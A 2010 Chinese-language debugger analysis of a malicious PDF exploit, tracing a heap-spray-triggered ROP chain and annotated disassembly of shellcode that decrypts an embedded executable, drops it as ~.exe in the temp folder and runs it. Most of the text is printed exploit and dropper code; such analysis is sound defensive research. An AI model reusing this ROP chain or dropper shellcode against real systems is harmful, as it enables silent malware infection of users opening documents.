Date:2010.11.3
Author:Cryin'
OD附加断在07002FE1位置
代码:
07002FE1 8B56 18 MOV EDX,DWORD PTR DS:[ESI+18]
07002FE4 85D2 TEST EDX,EDX
07002FE6 74 12 JE SHORT BIB.07002FFA
07002FE8 8B46 0C MOV EAX,DWORD PTR DS:[ESI+C]
07002FEB 8B4E 04 MOV ECX,DWORD PTR DS:[ESI+4]
07002FEE 50 PUSH EAX
07002FEF 51 PUSH ECX
07002FF0 56 PUSH ESI
07002FF1 FFD2 CALL EDX //EDX->BIB.070048EF
查看堆栈:
07002ff1 ffd2 call edx {BIB!BIBInitialize4+0xb3c (070048ef)}
0:000> r
eax=0c0c0c1c ebx=275505f8 ecx=cccccccc edx=070048ef esi=0c0c0c0c edi=2758c6a5
eip=07002ff1 esp=0012dd0c ebp=0012ddf0 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
BIB+0x2ff1:
07002ff1 ffd2 call edx {BIB!BIBInitialize4+0xb3c (070048ef)}
跟进去就是 ROP 链的开始:
070048EF 94 XCHG EAX,ESP
070048F0 C3 RETN //07004919
07004919 59 POP ECX
0700491A 59 POP ECX
//BIB.070048EF
0700491B C740 0C 0100000>MOV DWORD PTR DS:[EAX+C],1
07004922 5E POP ESI
07004923 5B POP EBX
07004924 C3 RETN //07009084
07009084 C3 RETN //重复数次后跳转至07009033
07009033 C2 1800 RETN 18 //07009033
07009084 C3 RETN //重复数次后跳转07001599
07001599 5D POP EBP
//[esp]000101240 UNICODE "ramFiles=C:\Program Files\Common Files"
0700159A C3 RETN //070072F7
070072F7 58 POP EAX //00010104 UNICODE "nsole"
070072F8 C3 RETN //070015BB
070015BB 59 POP ECX //BIB.070048EF
070015BC C3 RETN //0700154D
0700154D 8908 MOV DWORD PTR DS:[EAX],ECX
0700154F C3 RETN //070015BB
070015BB 59 POP ECX
; 7FFE0300
070015BC C3 RETN //07007FB2
07007FB2 8B01 MOV EAX,DWORD PTR DS:[ECX]
; ntdll.KiFastSystemCall
07007FB4 C3 RETN //070015BB
070015BB 59 POP ECX
//00010011
070015BC C3 RETN //0700A8AC
0700A8AC 8901 MOV DWORD PTR DS:[ECX],EAX
// ntdll.KiFastSystemCall
0700A8AE 33C0 XOR EAX,EAX
0700A8B0 C3 RETN //070015BB
070015BB 59 POP ECX
// 00010100
070015BC C3 RETN //0700A8AC
0700A8AC 8901 MOV DWORD PTR DS:[ECX],EAX
0700A8AE 33C0 XOR EAX,EAX
0700A8B0 C3 RETN //070072F7
070072F7 58 POP EAX
//00010011
070072F8 C3 RETN //070052E2
070052E2 FF10 CALL DWORD PTR DS:[EAX]
//跳转7C92E510 ; ntdll.KiFastSystemCall
070052E4 C3 RETN //07005C54
7C92E510 K> 8BD4 MOV EDX,ESP
7C92E512 0F34 SYSENTER //注意
7C92E514 K> C3 RETN
07005C54 5E POP ESI
//BIB.0700156F
07005C55 83C4 14 ADD ESP,14
07005C58 C3 RETN //0700D731
0700D731 8B45 DC MOV EAX,DWORD PTR SS:[EBP-24]
0700D734 C3 RETN //070015BB
070015BB 59 POP ECX
070015BC C3 RETN //0700154D
0700154D 8908 MOV DWORD PTR DS:[EAX],ECX
0700154F C3 RETN //0700A722
0700A722 83C0 04 ADD EAX,4
0700A725 C3 RETN //070015BB
070015BB 59 POP ECX
070015BC C3 RETN //0700154D
0700154D 8908 MOV DWORD PTR DS:[EAX],ECX
0700154F C3 RETN //0700A722一直重复最后跳转至0700112F
0700112F FFD0 CALL EAX // 跳去0FF90000拷贝shellcode
07FF0021 90 NOP
07001131 59 POP ECX
07001132 C2 0400 RETN 4
下面负责拷贝shellcode:
07FF0000 5A POP EDX ; BIB.07001131
07FF0001 90 NOP
07FF0002 54 PUSH ESP
07FF0003 90 NOP
07FF0004 5A POP EDX
07FF0005 EB 15 JMP SHORT 07FF001C
07FF0007 58 POP EAX
07FF0008 8B1A MOV EBX,DWORD PTR DS:[EDX]
//完成shellcode拷贝
07FF000A 8918 MOV DWORD PTR DS:[EAX],EBX
07FF000C 83C0 04 ADD EAX,4
07FF000F 83C2 04 ADD EDX,4
07FF0012 81FB 0C0C0C0C CMP EBX,0C0C0C0C
07FF0018 ^ 75 EE JNZ SHORT 07FF0008
07FF001A EB 05 JMP SHORT 07FF0021
//跳转去07FF0021执行shellcode
07FF001C E8 E6FFFFFF CALL 07FF0007
接着就开始执行shellcode:
07FF0021 90 NOP //拷贝数据的开始位置
07FF0022 90 NOP
07FF0023 90 NOP
07FF0024 90 NOP
07FF0025 E9 2F050000 JMP 07FF0559 //跳到shellcode入口,执行shellcode
07FF002A C3 RETN
07FF002B 8BC0 MOV EAX,EAX
07FF002D 33D2 XOR EDX,EDX //07FF0505调用此过程
07FF002F EB 02 JMP SHORT 07FF0033 //跳转07FF0033
07FF0031 40 INC EAX
07FF0032 42 INC EDX //edx保存长度
07FF0033 8038 00 CMP BYTE PTR DS:[EAX],0
07FF0036 ^ 75 F9 JNZ SHORT 07FF0031
07FF0038 8BC2 MOV EAX,EDX
07FF003A C3 RETN
07FF003B 8BC0 MOV EAX,EAX
07FF003D 51 PUSH ECX //07FF029E调用此过程
07FF003E 890424 MOV DWORD PTR SS:[ESP],EAX
07FF0041 EB 04 JMP SHORT 07FF0047
07FF0043 8808 MOV BYTE PTR DS:[EAX],CL
07FF0045 40 INC EAX
07FF0046 42 INC EDX
07FF0047 8A0A MOV CL,BYTE PTR DS:[EDX]
07FF0049 84C9 TEST CL,CL
07FF004B ^ 75 F6 JNZ SHORT 07FF0043
07FF004D C600 00 MOV BYTE PTR DS:[EAX],0
07FF0050 8B0424 MOV EAX,DWORD PTR SS:[ESP]
07FF0053 5A POP EDX
07FF0054 C3 RETN
07FF0055 56 PUSH ESI
//07FF035B处CALL 07FF0055到这里
07FF0056 57 PUSH EDI
07FF0057 BE 01000000 MOV ESI,1
07FF005C 3BD6 CMP EDX,ESI
07FF005E 72 08 JB SHORT 07FF0068
07FF0060 3008 XOR BYTE PTR DS:[EAX],CL
//ECX为7C80187B,即CL为7B,每个字节与之异或进行解密
07FF0062 46 INC ESI
07FF0063 40 INC EAX
07FF0064 3BD6 CMP EDX,ESI
07FF0066 ^ 73 F8 JNB SHORT 07FF0060
07FF0068 8BC7 MOV EAX,EDI
07FF006A 5F POP EDI
07FF006B 5E POP ESI
07FF006C C3 RETN
07FF006D 64:8B05 3000000>MOV EAX,DWORD PTR FS:[30]
//这是获取kernel32.dll基址的过程,FS:[30]显眼
07FF0074 85C0 TEST EAX,EAX
07FF0076 78 0E JS SHORT 07FF0086
07FF0078 8B40 0C MOV EAX,DWORD PTR DS:[EAX+C]
07FF007B 8B40 14 MOV EAX,DWORD PTR DS:[EAX+14]
07FF007E 8B00 MOV EAX,DWORD PTR DS:[EAX]
07FF0080 8B00 MOV EAX,DWORD PTR DS:[EAX]
07FF0082 8B40 10 MOV EAX,DWORD PTR DS:[EAX+10]
07FF0085 C3 RETN
07FF0086 8B40 34 MOV EAX,DWORD PTR DS:[EAX+34]
07FF0089 8B80 B8000000 MOV EAX,DWORD PTR DS:[EAX+B8]
07FF008F C3 RETN
07FF0090 90 NOP
07FF0091 51 PUSH ECX
07FF0092 33D2 XOR EDX,EDX
07FF0094 EB 16 JMP SHORT 07FF00AC
07FF0096 8BCA MOV ECX,EDX
07FF0098 C1E1 03 SHL ECX,3
07FF009B 83E1 FF AND ECX,FFFFFFFF
07FF009E C1EA 1D SHR EDX,1D
07FF00A1 0BCA OR ECX,EDX
07FF00A3 33D2 XOR EDX,EDX
07FF00A5 8A10 MOV DL,BYTE PTR DS:[EAX]
07FF00A7 33CA XOR ECX,EDX
07FF00A9 8BD1 MOV EDX,ECX
07FF00AB 40 INC EAX
07FF00AC 8038 00 CMP BYTE PTR DS:[EAX],0
07FF00AF ^ 75 E5 JNZ SHORT 07FF0096
07FF00B1 891424 MOV DWORD PTR SS:[ESP],EDX
07FF00B4 8B0424 MOV EAX,DWORD PTR SS:[ESP]
07FF00B7 5A POP EDX
07FF00B8 C3 RETN
07FF00B9 55 PUSH EBP //这里搜索定位API地址
07FF00BA 8BEC MOV EBP,ESP
07FF00BC 83C4 E4 ADD ESP,-1C
07FF00BF 53 PUSH EBX
07FF00C0 56 PUSH ESI
07FF00C1 57 PUSH EDI
07FF00C2 8B5D 08 MOV EBX,DWORD PTR SS:[EBP+8]
07FF00C5 8B45 0C MOV EAX,DWORD PTR SS:[EBP+C]
07FF00C8 8945 FC MOV DWORD PTR SS:[EBP-4],EAX
07FF00CB 8BC3 MOV EAX,EBX
07FF00CD 66:8138 4D5A CMP WORD PTR DS:[EAX],5A4D
07FF00D2 0F85 C2000000 JNZ 07FF019A
07FF00D8 8B40 3C MOV EAX,DWORD PTR DS:[EAX+3C]
07FF00DB 03C3 ADD EAX,EBX
07FF00DD 8945 F4 MOV DWORD PTR SS:[EBP-C],EAX
07FF00E0 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C]
07FF00E3 8138 50450000 CMP DWORD PTR DS:[EAX],4550
07FF00E9 0F85 AB000000 JNZ 07FF019A
07FF00EF 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C]
07FF00F2 83C0 78 ADD EAX,78
07FF00F5 8338 00 CMP DWORD PTR DS:[EAX],0
07FF00F8 0F84 9C000000 JE 07FF019A
07FF00FE 8378 04 00 CMP DWORD PTR DS:[EAX+4],0
07FF0102 0F84 92000000 JE 07FF019A
07FF0108 8B55 F4 MOV EDX,DWORD PTR SS:[EBP-C]
07FF010B 8B52 78 MOV EDX,DWORD PTR DS:[EDX+78]
07FF010E 8BC3 MOV EAX,EBX
07FF0110 03D0 ADD EDX,EAX
07FF0112 8955 F0 MOV DWORD PTR SS:[EBP-10],EDX
07FF0115 8B55 F0 MOV EDX,DWORD PTR SS:[EBP-10]
07FF0118 837A 18 00 CMP DWORD PTR DS:[EDX+18],0
07FF011C 74 7C JE SHORT 07FF019A
07FF011E 8B55 F0 MOV EDX,DWORD PTR SS:[EBP-10]
07FF0121 8B52 20 MOV EDX,DWORD PTR DS:[EDX+20]
07FF0124 03D0 ADD EDX,EAX
07FF0126 8955 E8 MOV DWORD PTR SS:[EBP-18],EDX
07FF0129 8B55 F0 MOV EDX,DWORD PTR SS:[EBP-10]
07FF012C 8B52 24 MOV EDX,DWORD PTR DS:[EDX+24]
07FF012F 03D0 ADD EDX,EAX
07FF0131 8955 EC MOV DWORD PTR SS:[EBP-14],EDX
07FF0134 8B55 F0 MOV EDX,DWORD PTR SS:[EBP-10]
07FF0137 8B52 1C MOV EDX,DWORD PTR DS:[EDX+1C]
07FF013A 03D0 ADD EDX,EAX
07FF013C 8955 E4 MOV DWORD PTR SS:[EBP-1C],EDX
07FF013F 8B45 F0 MOV EAX,DWORD PTR SS:[EBP-10]
07FF0142 8B78 18 MOV EDI,DWORD PTR DS:[EAX+18]
07FF0145 4F DEC EDI
07FF0146 85FF TEST EDI,EDI
07FF0148 72 50 JB SHORT 07FF019A
07FF014A 47 INC EDI
07FF014B 33F6 XOR ESI,ESI
07FF014D 8B45 E8 MOV EAX,DWORD PTR SS:[EBP-18]
07FF0150 8B04B0 MOV EAX,DWORD PTR DS:[EAX+ESI*4]
07FF0153 03C3 ADD EAX,EBX
07FF0155 E8 37FFFFFF CALL 07FF0091
07FF015A 3B45 0C CMP EAX,DWORD PTR SS:[EBP+C]
07FF015D 75 37 JNZ SHORT 07FF0196
07FF015F 837D 10 00 CMP DWORD PTR SS:[EBP+10],0
07FF0163 74 1D JE SHORT 07FF0182
07FF0165 8B45 10 MOV EAX,DWORD PTR SS:[EBP+10]
07FF0168 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX
07FF016B 8B45 EC MOV EAX,DWORD PTR SS:[EBP-14]
07FF016E 0FB70470 MOVZX EAX,WORD PTR DS:[EAX+ESI*2]
07FF0172 8B55 F0 MOV EDX,DWORD PTR SS:[EBP-10]
07FF0175 0342 10 ADD EAX,DWORD PTR DS:[EDX+10]
07FF0178 50 PUSH EAX
07FF0179 53 PUSH EBX
07FF017A FF55 F8 CALL DWORD PTR SS:[EBP-8]
07FF017D 8945 FC MOV DWORD PTR SS:[EBP-4],EAX
07FF0180 EB 18 JMP SHORT 07FF019A
07FF0182 8B45 EC MOV EAX,DWORD PTR SS:[EBP-14]
07FF0185 0FB70470 MOVZX EAX,WORD PTR DS:[EAX+ESI*2]
07FF0189 8B55 E4 MOV EDX,DWORD PTR SS:[EBP-1C]
07FF018C 8B0482 MOV EAX,DWORD PTR DS:[EDX+EAX*4]
07FF018F 03C3 ADD EAX,EBX
07FF0191 8945 FC MOV DWORD PTR SS:[EBP-4],EAX
07FF0194 EB 04 JMP SHORT 07FF019A
07FF0196 46 INC ESI
07FF0197 4F DEC EDI
07FF0198 ^ 75 B3 JNZ SHORT 07FF014D
07FF019A 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]
07FF019D 5F POP EDI
07FF019E 5E POP ESI
07FF019F 5B POP EBX
07FF01A0 8BE5 MOV ESP,EBP
07FF01A2 5D POP EBP
07FF01A3 C2 0C00 RETN 0C
07FF01A6 8D40 00 LEA EAX,DWORD PTR DS:[EAX]
07FF01A9 51 PUSH ECX //07FF058D调用此过程
07FF01AA 890424 MOV DWORD PTR SS:[ESP],EAX
07FF01AD EB 0C JMP SHORT 07FF01BB
07FF01AF 40 INC EAX
07FF01B0 8038 22 CMP BYTE PTR DS:[EAX],22
07FF01B3 75 06 JNZ SHORT 07FF01BB
07FF01B5 40 INC EAX
07FF01B6 890424 MOV DWORD PTR SS:[ESP],EAX
07FF01B9 EB 05 JMP SHORT 07FF01C0
07FF01BB 8038 00 CMP BYTE PTR DS:[EAX],0
07FF01BE ^ 75 EF JNZ SHORT 07FF01AF
07FF01C0 8B0424 MOV EAX,DWORD PTR SS:[ESP]
07FF01C3 5A POP EDX
07FF01C4 C3 RETN //返回
07FF01C5 51 PUSH ECX //07FF059F调用此过程
07FF01C6 890424 MOV DWORD PTR SS:[ESP],EAX
07FF01C9 EB 09 JMP SHORT 07FF01D4
07FF01CB 80F9 22 CMP CL,22
07FF01CE 74 0A JE SHORT 07FF01DA
07FF01D0 8808 MOV BYTE PTR DS:[EAX],CL
07FF01D2 40 INC EAX
07FF01D3 42 INC EDX
07FF01D4 8A0A MOV CL,BYTE PTR DS:[EDX]
07FF01D6 84C9 TEST CL,CL
07FF01D8 ^ 75 F1 JNZ SHORT 07FF01CB
07FF01DA C600 00 MOV BYTE PTR DS:[EAX],0
07FF01DD 8B0424 MOV EAX,DWORD PTR SS:[ESP]
07FF01E0 5A POP EDX
07FF01E1 C3 RETN
07FF01E2 8D40 00 LEA EAX,DWORD PTR DS:[EAX]
07FF01E5 83C4 F8 ADD ESP,-8 //07FF0296调用此过程
07FF01E8 8D5424 04 LEA EDX,DWORD PTR SS:[ESP+4]
07FF01EC 33C9 XOR ECX,ECX
07FF01EE 890C24 MOV DWORD PTR SS:[ESP],ECX
07FF01F1 8902 MOV DWORD PTR DS:[EDX],EAX
07FF01F3 EB 02 JMP SHORT 07FF01F7
07FF01F5 FF02 INC DWORD PTR DS:[EDX]
07FF01F7 8B0A MOV ECX,DWORD PTR DS:[EDX]
07FF01F9 8039 00 CMP BYTE PTR DS:[ECX],0
07FF01FC ^ 75 F7 JNZ SHORT 07FF01F5
07FF01FE EB 13 JMP SHORT 07FF0213
07FF0200 8B0A MOV ECX,DWORD PTR DS:[EDX]
07FF0202 8039 5C CMP BYTE PTR DS:[ECX],5C
07FF0205 75 0A JNZ SHORT 07FF0211
07FF0207 8B02 MOV EAX,DWORD PTR DS:[EDX]
07FF0209 890424 MOV DWORD PTR SS:[ESP],EAX
07FF020C FF0424 INC DWORD PTR SS:[ESP]
07FF020F EB 06 JMP SHORT 07FF0217
07FF0211 FF0A DEC DWORD PTR DS:[EDX]
07FF0213 3B02 CMP EAX,DWORD PTR DS:[EDX]
07FF0215 ^ 76 E9 JBE SHORT 07FF0200
07FF0217 8B0424 MOV EAX,DWORD PTR SS:[ESP]
07FF021A 59 POP ECX
07FF021B 5A POP EDX
07FF021C C3 RETN //返回
07FF021D 53 PUSH EBX
07FF021E 56 PUSH ESI
07FF021F 57 PUSH EDI
07FF0220 51 PUSH ECX
07FF0221 8BF9 MOV EDI,ECX
07FF0223 8BD8 MOV EBX,EAX
07FF0225 6A 00 PUSH 0
07FF0227 68 80000000 PUSH 80
07FF022C 6A 02 PUSH 2
07FF022E 6A 00 PUSH 0
07FF0230 6A 02 PUSH 2
07FF0232 68 00000040 PUSH 40000000
07FF0237 52 PUSH EDX
07FF0238 FF53 12 CALL DWORD PTR DS:[EBX+12]
07FF023B 8BF0 MOV ESI,EAX
07FF023D 6A 00 PUSH 0
07FF023F 6A 00 PUSH 0
07FF0241 6A 00 PUSH 0
07FF0243 56 PUSH ESI
07FF0244 FF53 2E CALL DWORD PTR DS:[EBX+2E]
07FF0247 6A 00 PUSH 0
07FF0249 8D4424 04 LEA EAX,DWORD PTR SS:[ESP+4]
07FF024D 50 PUSH EAX
07FF024E 8BC7 MOV EAX,EDI
07FF0250 E8 D8FDFFFF CALL 07FF002D
07FF0255 50 PUSH EAX
07FF0256 57 PUSH EDI
07FF0257 56 PUSH ESI
07FF0258 FF53 16 CALL DWORD PTR DS:[EBX+16]
07FF025B 56 PUSH ESI
07FF025C FF53 22 CALL DWORD PTR DS:[EBX+22]
07FF025F 5A POP EDX
07FF0260 5F POP EDI
07FF0261 5E POP ESI
07FF0262 5B POP EBX
07FF0263 C3 RETN
07FF0264 90 NOP
07FF0265 53 PUSH EBX
//准备工作做完后,开始实现功能
07FF0266 56 PUSH ESI
07FF0267 57 PUSH EDI
07FF0268 55 PUSH EBP
07FF0269 81C4 58FCFFFF ADD ESP,-3A8
07FF026F 894C24 04 MOV DWORD PTR SS:[ESP+4],ECX
07FF0273 8BF2 MOV ESI,EDX
07FF0275 890424 MOV DWORD PTR SS:[ESP],EAX
07FF0278 8B1C24 MOV EBX,DWORD PTR SS:[ESP]
07FF027B 837C24 04 00 CMP DWORD PTR SS:[ESP+4],0
07FF0280 75 23 JNZ SHORT 07FF02A5 //跳转实现
07FF0282 8D4424 18 LEA EAX,DWORD PTR SS:[ESP+18]
07FF0286 50 PUSH EAX
07FF0287 68 04010000 PUSH 104
07FF028C FF53 2A CALL DWORD PTR DS:[EBX+2A]
07FF028F 8D4404 18 LEA EAX,DWORD PTR SS:[ESP+EAX+18]
07FF0293 50 PUSH EAX
07FF0294 8BC6 MOV EAX,ESI
07FF0296 E8 4AFFFFFF CALL 07FF01E5
07FF029B 8BD0 MOV EDX,EAX
07FF029D 58 POP EAX
07FF029E E8 9AFDFFFF CALL 07FF003D
07FF02A3 EB 1C JMP SHORT 07FF02C1
07FF02A5 8D4424 18 LEA EAX,DWORD PTR SS:[ESP+18]
07FF02A9 50 PUSH EAX
07FF02AA 68 04010000 PUSH 104
07FF02AF FF53 2A CALL DWORD PTR DS:[EBX+2A]
//这个调用GetTempPathA函数
07FF02B2 8D4404 18 LEA EAX,DWORD PTR SS:[ESP+EAX+18]
07FF02B6 8B1424 MOV EDX,DWORD PTR SS:[ESP]
07FF02B9 83C2 69 ADD EDX,69 //添加~.exe这个名字
07FF02BC E8 7CFDFFFF CALL 07FF003D
07FF02C1 6A 00 PUSH 0
07FF02C3 68 80000000 PUSH 80
07FF02C8 6A 03 PUSH 3
07FF02CA 6A 00 PUSH 0
07FF02CC 6A 01 PUSH 1
07FF02CE 68 00000080 PUSH 80000000
07FF02D3 56 PUSH ESI
07FF02D4 FF53 12 CALL DWORD PTR DS:[EBX+12]
//调用CreateFileA,这个在shellcode里面很明显
07FF02D7 8BF0 MOV ESI,EAX //返回的是0xFFFFFFFF,即INVALID_HANDLE_VALUE,说明这次打开文件失败
07FF02D9 6A 00 PUSH 0
07FF02DB 68 80000000 PUSH 80
07FF02E0 6A 02 PUSH 2
07FF02E2 6A 00 PUSH 0
07FF02E4 6A 02 PUSH 2
07FF02E6 68 00000040 PUSH 40000000
07FF02EB 8D4424 30 LEA EAX,DWORD PTR SS:[ESP+30]
//取得~.exe的完整路径
07FF02EF 50 PUSH EAX
07FF02F0 FF53 12 CALL DWORD PTR DS:[EBX+12]
//在此再次调用CreateFileA,注意这里的参数不同
07FF02F3 8BE8 MOV EBP,EAX
//这里返回0x000003E4,知道是句柄就可以了!
07FF02F5 33FF XOR EDI,EDI
07FF02F7 837C24 04 01 CMP DWORD PTR SS:[ESP+4],1 //[ESP+4]为1
07FF02FC 75 0E JNZ SHORT 07FF030C //跳转未实现
07FF02FE 6A 00 PUSH 0
07FF0300 6A 00 PUSH 0
07FF0302 8B43 4E MOV EAX,DWORD PTR DS:[EBX+4E]
//此处比较重要,[EBX+4E]保存的是exe在PDF文件中的偏移地址,snowdbg优化过js喷射后释放的exe就多出了一些数据,就是因为这里的原因
07FF0305 50 PUSH EAX
07FF0306 56 PUSH ESI
07FF0307 FF53 2E CALL DWORD PTR DS:[EBX+2E]
//调用SetFilePointer,从上面就已经能猜到
07FF030A EB 0F JMP SHORT 07FF031B //直接跳转,07FF031B
07FF030C 6A 00 PUSH 0
07FF030E 6A 00 PUSH 0
07FF0310 8B43 4E MOV EAX,DWORD PTR DS:[EBX+4E]
07FF0313 0343 52 ADD EAX,DWORD PTR DS:[EBX+52]
07FF0316 50 PUSH EAX
07FF0317 56 PUSH ESI
07FF0318 FF53 2E CALL DWORD PTR DS:[EBX+2E]
07FF031B 6A 00 PUSH 0
07FF031D 6A 00 PUSH 0
07FF031F 6A 00 PUSH 0
07FF0321 55 PUSH EBP //这里EBP为000003E4
07FF0322 FF53 2E CALL DWORD PTR DS:[EBX+2E]
//又调用调用SetFilePointer
07FF0325 8B4424 04 MOV EAX,DWORD PTR SS:[ESP+4]
//[ESP+4]为0C0C07E8 00000001
07FF0329 83E8 01 SUB EAX,1
07FF032C 72 57 JB SHORT 07FF0385 //未跳转
07FF032E 0F85 BB000000 JNZ 07FF03EF //未跳转
07FF0334 6A 00 PUSH 0
07FF0336 8D4424 18 LEA EAX,DWORD PTR SS:[ESP+18]
07FF033A 50 PUSH EAX
07FF033B 68 90010000 PUSH 190
07FF0340 8D8424 24010000 LEA EAX,DWORD PTR SS:[ESP+124]
07FF0347 50 PUSH EAX //0C0C08FC
07FF0348 56 PUSH ESI //此处句柄为0xFFFFFFFF
07FF0349 FF53 1A CALL DWORD PTR DS:[EBX+1A] //ReadFile
07FF034C 8D8424 18010000 LEA EAX,DWORD PTR SS:[ESP+118]
07FF0353 8A4B 56 MOV CL,BYTE PTR DS:[EBX+56]
07FF0356 BA 90010000 MOV EDX,190
07FF035B E8 F5FCFFFF CALL 07FF0055
//转到07FF0055将读取的数据进行解密
07FF0360 6A 00 PUSH 0
07FF0362 8D4424 18 LEA EAX,DWORD PTR SS:[ESP+18]
07FF0366 50 PUSH EAX
07FF0367 68 90010000 PUSH 190
07FF036C 8D8424 24010000 LEA EAX,DWORD PTR SS:[ESP+124]
07FF0373 50 PUSH EAX
07FF0374 55 PUSH EBP
07FF0375 FF53 16 CALL DWORD PTR DS:[EBX+16] //WriteFile
07FF0378 81C7 90010000 ADD EDI,190
07FF037E 3B7B 52 CMP EDI,DWORD PTR DS:[EBX+52]
//每次读取0x190(400)字节,直到读完[EBX+52]即0x25800字节
07FF0381 ^ 72 B1 JB SHORT 07FF0334
07FF0383 EB 6A JMP SHORT 07FF03EF //跳转07FF03EF
07FF0385 6A 00 PUSH 0
07FF0387 6A 00 PUSH 0
07FF0389 68 458B0000 PUSH 8B45
07FF038E 56 PUSH ESI
07FF038F FF53 2E CALL DWORD PTR DS:[EBX+2E]
07FF0392 6A 00 PUSH 0
07FF0394 8D4424 18 LEA EAX,DWORD PTR SS:[ESP+18]
07FF0398 50 PUSH EAX
07FF0399 6A 04 PUSH 4
07FF039B 8D4424 18 LEA EAX,DWORD PTR SS:[ESP+18]
07FF039F 50 PUSH EAX
07FF03A0 56 PUSH ESI
07FF03A1 FF53 1A CALL DWORD PTR DS:[EBX+1A]
07FF03A4 6A 00 PUSH 0
07FF03A6 6A 00 PUSH 0
07FF03A8 8B43 4E MOV EAX,DWORD PTR DS:[EBX+4E]
07FF03AB 0343 52 ADD EAX,DWORD PTR DS:[EBX+52]
07FF03AE 50 PUSH EAX
07FF03AF 56 PUSH ESI
07FF03B0 FF53 2E CALL DWORD PTR DS:[EBX+2E]
07FF03B3 6A 00 PUSH 0
07FF03B5 8D4424 18 LEA EAX,DWORD PTR SS:[ESP+18]
07FF03B9 50 PUSH EAX
07FF03BA 6A 01 PUSH 1
07FF03BC 8D4424 1C LEA EAX,DWORD PTR SS:[ESP+1C]
07FF03C0 50 PUSH EAX
07FF03C1 56 PUSH ESI
07FF03C2 FF53 1A CALL DWORD PTR DS:[EBX+1A]
07FF03C5 8D4424 10 LEA EAX,DWORD PTR SS:[ESP+10]
07FF03C9 8A4B 56 MOV CL,BYTE PTR DS:[EBX+56]
07FF03CC BA 01000000 MOV EDX,1
07FF03D1 E8 7FFCFFFF CALL 07FF0055
07FF03D6 6A 00 PUSH 0
07FF03D8 8D4424 18 LEA EAX,DWORD PTR SS:[ESP+18]
07FF03DC 50 PUSH EAX
07FF03DD 6A 01 PUSH 1
07FF03DF 8D4424 1C LEA EAX,DWORD PTR SS:[ESP+1C]
07FF03E3 50 PUSH EAX
07FF03E4 55 PUSH EBP
07FF03E5 FF53 16 CALL DWORD PTR DS:[EBX+16]
07FF03E8 47 INC EDI
07FF03E9 3B7C24 0C CMP EDI,DWORD PTR SS:[ESP+C]
07FF03ED ^ 72 C4 JB SHORT 07FF03B3
07FF03EF 56 PUSH ESI
//前面esi保存的是0xFFFFFFFF句柄
07FF03F0 FF53 22 CALL DWORD PTR DS:[EBX+22] //CloseHandle
07FF03F3 55 PUSH EBP
//前面ebp保存的是000003E4句柄
07FF03F4 FF53 22 CALL DWORD PTR DS:[EBX+22]
07FF03F7 8B4424 04 MOV EAX,DWORD PTR SS:[ESP+4]
07FF03FB 83E8 01 SUB EAX,1
07FF03FE 72 0B JB SHORT 07FF040B //跳转未实现
07FF0400 0F84 90000000 JE 07FF0496 //这里跳07FF0496
07FF0406 E9 9F000000 JMP 07FF04AA
07FF040B 8D53 74 LEA EDX,DWORD PTR DS:[EBX+74]
07FF040E 8D8424 A8020000 LEA EAX,DWORD PTR SS:[ESP+2A8]
07FF0415 E8 23FCFFFF CALL 07FF003D
07FF041A 8D43 74 LEA EAX,DWORD PTR DS:[EBX+74]
07FF041D E8 0BFCFFFF CALL 07FF002D
07FF0422 8D8404 A8020000 LEA EAX,DWORD PTR SS:[ESP+EAX+2A8]
07FF0429 8D5424 18 LEA EDX,DWORD PTR SS:[ESP+18]
07FF042D E8 0BFCFFFF CALL 07FF003D
07FF0432 8D43 74 LEA EAX,DWORD PTR DS:[EBX+74]
07FF0435 E8 F3FBFFFF CALL 07FF002D
07FF043A 8BF0 MOV ESI,EAX
07FF043C 8D4424 18 LEA EAX,DWORD PTR SS:[ESP+18]
07FF0440 E8 E8FBFFFF CALL 07FF002D
07FF0445 03F0 ADD ESI,EAX
07FF0447 8D8434 A8020000 LEA EAX,DWORD PTR SS:[ESP+ESI+2A8]
07FF044E 8D93 CA000000 LEA EDX,DWORD PTR DS:[EBX+CA]
07FF0454 E8 E4FBFFFF CALL 07FF003D
07FF0459 8D4424 18 LEA EAX,DWORD PTR SS:[ESP+18]
07FF045D 50 PUSH EAX
07FF045E 68 04010000 PUSH 104
07FF0463 FF53 2A CALL DWORD PTR DS:[EBX+2A]
07FF0466 8D4404 18 LEA EAX,DWORD PTR SS:[ESP+EAX+18]
07FF046A 8D53 5F LEA EDX,DWORD PTR DS:[EBX+5F]
07FF046D E8 CBFBFFFF CALL 07FF003D
07FF0472 8D8C24 A8020000 LEA ECX,DWORD PTR SS:[ESP+2A8]
07FF0479 8D5424 18 LEA EDX,DWORD PTR SS:[ESP+18]
07FF047D 8B0424 MOV EAX,DWORD PTR SS:[ESP]
07FF0480 E8 98FDFFFF CALL 07FF021D
07FF0485 6A 00 PUSH 0
07FF0487 8D4424 1C LEA EAX,DWORD PTR SS:[ESP+1C]
07FF048B 50 PUSH EAX
07FF048C FF53 26 CALL DWORD PTR DS:[EBX+26]
07FF048F 6A 00 PUSH 0
07FF0491 FF53 36 CALL DWORD PTR DS:[EBX+36]
07FF0494 EB 14 JMP SHORT 07FF04AA
07FF0496 6A 01 PUSH 1 //
07FF0498 6A 00 PUSH 0
07FF049A 6A 00 PUSH 0
07FF049C 8D4424 24 LEA EAX,DWORD PTR SS:[ESP+24]
//eax为释放的~.exe的路径
07FF04A0 50 PUSH EAX
07FF04A1 8D43 5A LEA EAX,DWORD PTR DS:[EBX+5A] //"open"参数
07FF04A4 50 PUSH EAX
07FF04A5 6A 00 PUSH 0
07FF04A7 FF53 46 CALL DWORD PTR DS:[EBX+46]
//调用ShellExecuteA运行exe
07FF04AA 8A4424 08 MOV AL,BYTE PTR SS:[ESP+8]
07FF04AE 81C4 A8030000 ADD ESP,3A8 //平衡堆栈
07FF04B4 5D POP EBP
07FF04B5 5F POP EDI
07FF04B6 5E POP ESI
07FF04B7 5B POP EBX
07FF04B8 C3 RETN //返回到07FF05B7
07FF04B9 53 PUSH EBX //07FF057E跳至此
07FF04BA 56 PUSH ESI
07FF04BB 57 PUSH EDI
07FF04BC 55 PUSH EBP
07FF04BD 83C4 F4 ADD ESP,-0C
07FF04C0 8D6C24 04 LEA EBP,DWORD PTR SS:[ESP+4]
07FF04C4 C60424 00 MOV BYTE PTR SS:[ESP],0
07FF04C8 8BD8 MOV EBX,EAX
07FF04CA E8 9EFBFFFF CALL 07FF006D
